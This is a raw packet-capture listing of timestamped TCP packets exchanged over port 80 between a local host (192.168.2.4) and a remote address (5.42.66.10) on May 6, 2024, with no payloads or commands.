May 6, 2024 07:53:04.808346033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808346987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.808356047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.808376074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.808388948 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.808407068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808418989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808443069 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.808456898 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.019989014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020009041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020049095 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.020348072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020391941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.020392895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020406008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020416975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020427942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020436049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.020442009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020453930 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.020478964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.020539045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020566940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020580053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020581961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.020605087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.020623922 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.020626068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020637035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020653963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020668983 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.020678997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020698071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.020720005 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.020750999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020761967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020772934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020783901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020796061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020797014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.020811081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020821095 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.020823002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020836115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020837069 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.020848036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020857096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020864010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.020879984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020891905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020893097 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.020904064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020920992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020929098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.020946026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.020968914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.020977020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020987988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.020998001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021009922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021022081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021022081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021047115 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021063089 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021095037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021106958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021116972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021126986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021137953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021140099 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021150112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021162987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021164894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021173954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021184921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021186113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021198034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021203041 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021209955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021220922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021226883 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021243095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021254063 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021260977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021271944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021285057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021301985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021311045 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021318913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021332979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021349907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021373987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021378994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021393061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021403074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021419048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021425962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021431923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021440029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021442890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021451950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021462917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021475077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021495104 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021502972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021513939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021519899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021526098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021538019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021549940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021553993 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021562099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021573067 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021573067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021599054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021600962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021610022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021620035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021625042 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021631956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021651030 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021677971 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021737099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021749020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021759033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021770954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021780014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021783113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021795988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021800041 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021809101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021826029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021826982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021836996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021847963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021853924 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021861076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021872044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021873951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021884918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021888018 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021897078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021908998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021918058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021922112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021934032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021945000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021945000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021958113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021961927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021970034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021981955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.021987915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.021994114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022016048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022017002 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022028923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022036076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022039890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022052050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022059917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022080898 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022104979 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022125959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022141933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022152901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022164106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022169113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022176027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022187948 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022213936 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022233009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022243023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022253990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022264957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022277117 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022279024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022289038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022296906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022319078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022320032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022331953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022344112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022344112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022355080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022363901 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022366047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022377968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022392035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022408962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022408962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022419930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022430897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022442102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022453070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022454977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022464991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022469044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022475958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022489071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022500038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022500038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022511959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022524118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022525072 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022542953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022547960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022571087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022594929 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022605896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022618055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022627115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022639036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022650003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022651911 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022661924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022674084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022680044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022686005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022697926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022699118 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022710085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022718906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022732019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022736073 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022743940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022759914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022782087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022787094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022798061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022826910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022836924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022846937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022857904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022869110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022881031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022882938 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022891998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022898912 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022903919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022916079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022919893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022928953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022945881 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022958994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022970915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022974014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.022981882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.022995949 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023005009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023016930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023024082 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023029089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023051023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023060083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023068905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023072004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023087978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023108006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023134947 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023150921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023163080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023173094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023185968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023196936 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023196936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023209095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023220062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023221970 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023231983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023238897 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023252964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023266077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023271084 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023296118 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023319960 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023329020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023340940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023350954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023363113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023372889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023374081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023394108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023400068 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023406982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023417950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023418903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023430109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023447037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023475885 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023494005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023505926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023514986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023526907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023538113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023540974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023550034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023561954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023562908 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023572922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023585081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023588896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023597956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023607969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023616076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023618937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023637056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023639917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023650885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023655891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023663998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023673058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023677111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023700953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023706913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023718119 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023727894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023729086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023749113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023756981 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023761988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023772955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023782969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023785114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023809910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023833036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023838997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023849964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023859978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023870945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023886919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023890972 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023899078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023907900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023910999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023922920 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023929119 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023942947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023955107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023957014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023977041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.023979902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.023989916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024003983 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024010897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:05.024019003 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:05.024022102 CEST	80	49741	5.42.66.10	192.168.2.4
